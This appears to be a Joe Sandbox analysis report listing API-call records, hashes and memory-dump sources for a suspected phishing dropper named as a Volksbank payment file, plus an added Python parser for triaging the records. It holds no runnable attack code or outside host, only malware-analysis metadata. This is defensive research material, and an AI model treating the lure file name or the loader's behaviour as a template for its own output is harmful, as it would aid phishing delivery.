  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
• GlobalFree.KERNEL32(?), ref: 1000256D
• GlobalFree.KERNEL32(00000000), ref: 100025A8
Memory Dump Source
• Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                                          • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                                                                                                                          • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                                                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                                                                                                                          • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                                                                                                                          • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharNextW.USER32(?,?,fareafvrgende\Djrve27.gud,?,00405C4F,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420,00000000), ref: 00405BE9
                                                                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00405BEE
                                                                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00405C06
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • fareafvrgende\Djrve27.gud, xrefs: 00405BDC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                                                                          • String ID: fareafvrgende\Djrve27.gud
                                                                                                                                                                                                                                          • API String ID: 3213498283-3469630132
                                                                                                                                                                                                                                          • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                                                                                                                                                                          • Instruction ID: 1410c8af8588119ed7c7bec0a33194e6879e2746ee2e5cb83f2c5ed70d44d846
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26F09022918B2D95FF3177584C55E7766B8EB55760B00803BE641B72C0D3F85C818EAA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 00405B36
                                                                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 00405B40
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405B52
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-3355392842
• Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
• Instruction ID: 96ba7b99f7925edb235d18d004fc1fe51c5fb87b1b333c4bf7b8a2937e57358f
• Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
• Instruction Fuzzy Hash: 44D05E21101924AAC1117B448C04EDF72ACAE45344342007AF241B30A1CB78295286FD

APIs
• DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,?,0000000A), ref: 00402E70
• GetTickCount.KERNEL32 ref: 00402E8E
• CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
• ShowWindow.USER32(00000000,00000005,?,00000006,?,0000000A), ref: 00402EB9
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
• Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
• Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
• Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC

APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
• CloseHandle.KERNEL32(?), ref: 0040587A
Strings
• Error launching installer, xrefs: 00405857
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
• Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
• Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
• Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78
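The "APIs" bullets in these function records all have one shape: API name, module, the argument values captured at the call site (a hex immediate, a string Joe resolved from a pointer, or "?" when nothing was captured) and the address of the call. Two values in the records above are worth decoding rather than reading raw: the sixth argument of CreateProcessW, 04000000, is dwCreationFlags and equals CREATE_DEFAULT_ERROR_MODE, and the second argument of ShowWindow, 00000005, is nCmdShow and equals SW_SHOW. The argument lists also run past the real parameter count (ShowWindow takes two parameters, six values appear), so anything beyond the documented position is stack residue, not an argument. The following Python is an added example, not Joe Sandbox code: the line format is inferred from the bullets on this page, the sample input is those same bullets, and the per-API parameter counts are taken from the Win32 documentation.

```python
"""Parse the 'APIs' bullets of a Joe Sandbox function record and decode the
argument values worth a second look.  Added example: the line format is
inferred from the bullets on this page, not taken from Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import List, Union

ArgValue = Union[int, str, None]  # hex immediate, resolved string, or None for '?'


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[ArgValue]
    ref: int  # call-site address inside the dumped image


# Sample input: bullets copied from the function records on this page.
SAMPLE_LINES = [
    "• DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,?,0000000A), ref: 00402E70",
    "• GetTickCount.KERNEL32 ref: 00402E8E",
    "• CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB",
    "• ShowWindow.USER32(00000000,00000005,?,00000006,?,0000000A), ref: 00402EB9",
    "• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,"
    "00000000,007A4F28,Error launching installer), ref: 0040586D",
    "• CloseHandle.KERNEL32(?), ref: 0040587A",
    "• FreeLibrary.KERNEL32(?,C:\\Users\\user\\AppData\\Local\\Temp\\,00000000,76943420,"
    "004038B0,004036C6,00000006,?,00000006,?,0000000A), ref: 004038F2",
    "• GlobalFree.KERNEL32(00A34BF0), ref: 004038F9",
]

# "Name.MODULE(arg,arg,...), ref: ADDR", or "Name.MODULE ref: ADDR" with no args.
_LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")


def _parse_arg(raw: str) -> ArgValue:
    raw = raw.strip()
    if raw == "?":
        return None  # Joe could not capture this slot
    if _HEX_RE.fullmatch(raw):
        return int(raw, 16)
    return raw  # a pointer Joe resolved to a string; keep it verbatim


def parse_api_lines(lines) -> List[ApiCall]:
    calls = []
    for line in lines:
        m = _LINE_RE.match(line)
        if not m:
            continue  # not an API bullet (e.g. a "Strings" or "Associated:" line)
        raw = m.group("args")
        # Resolved strings on this page contain no commas, so a plain split is safe.
        args = [_parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


# Subset of CreateProcess dwCreationFlags (winbase.h values).
CREATION_FLAGS = {
    0x00000001: "DEBUG_PROCESS",
    0x00000002: "DEBUG_ONLY_THIS_PROCESS",
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x00080000: "EXTENDED_STARTUPINFO_PRESENT",
    0x01000000: "CREATE_BREAKAWAY_FROM_JOB",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}


def decode_creation_flags(value: int) -> List[str]:
    names = [name for bit, name in sorted(CREATION_FLAGS.items()) if value & bit]
    leftover = value & ~sum(CREATION_FLAGS)  # priority-class bits etc. stay hex
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names


SW_NAMES = ["SW_HIDE", "SW_SHOWNORMAL", "SW_SHOWMINIMIZED", "SW_SHOWMAXIMIZED",
            "SW_SHOWNOACTIVATE", "SW_SHOW", "SW_MINIMIZE", "SW_SHOWMINNOACTIVE",
            "SW_SHOWNA", "SW_RESTORE", "SW_SHOWDEFAULT", "SW_FORCEMINIMIZE"]


def decode_show_window(value: int) -> str:
    return SW_NAMES[value] if 0 <= value < len(SW_NAMES) else f"SW_{value}"


# Documented parameter counts; values Joe shows past these are stack residue.
ARITY = {"CreateProcessW": 10, "ShowWindow": 2, "CloseHandle": 1, "FreeLibrary": 1,
         "GlobalFree": 1, "DestroyWindow": 1, "CreateDialogParamW": 5, "GetTickCount": 0}


def triage(calls: List[ApiCall]) -> List[str]:
    """One human-readable note per call whose arguments are worth decoding."""
    notes = []
    for c in calls:
        args = c.args[:ARITY.get(c.api, len(c.args))]
        if c.api == "CreateProcessW" and len(args) >= 6:
            app, cmd, _pa, _ta, inherit, flags = args[:6]
            flag_names = decode_creation_flags(flags) if isinstance(flags, int) else ["<unknown>"]
            notes.append(f"{c.ref:08X} CreateProcessW lpApplicationName={app} "
                         f"lpCommandLine={'<not captured>' if cmd is None else cmd} "
                         f"bInheritHandles={inherit} dwCreationFlags={'|'.join(flag_names)}")
        elif c.api == "ShowWindow" and len(args) >= 2 and isinstance(args[1], int):
            notes.append(f"{c.ref:08X} ShowWindow nCmdShow={decode_show_window(args[1])}")
    return notes


if __name__ == "__main__":
    for note in triage(parse_api_lines(SAMPLE_LINES)):
        print(note)
```

Run stand-alone it prints one line for the ShowWindow call (SW_SHOW) and one for CreateProcessW (lpApplicationName=0, command line not captured, handles not inherited, dwCreationFlags=CREATE_DEFAULT_ERROR_MODE). The tenth CreateProcessW slot, where lpProcessInformation belongs, shows the resolved string "Error launching installer"; the parser keeps it verbatim and does not decode it, since a string where a pointer is expected says only that Joe resolved whatever was on the stack.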
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76943420,004038B0,004036C6,00000006,?,00000006,?,0000000A), ref: 004038F2
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00A34BF0), ref: 004038F9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3355392842
• Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
• Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
• Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
• Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8
APIs
• lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405B82
• CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405B92
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-3370423016
• Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
• Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
• Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
• Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC
APIs
• GlobalAlloc.KERNEL32(?,?), ref: 1000116A
• GlobalFree.KERNEL32(00000000), ref: 100011C7
• GlobalFree.KERNEL32(00000000), ref: 100011D9
• GlobalFree.KERNEL32(?), ref: 10001203
Memory Dump Source
• Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
• Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
• Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
• Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
• Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
• CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEF
• lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8
Memory Dump Source
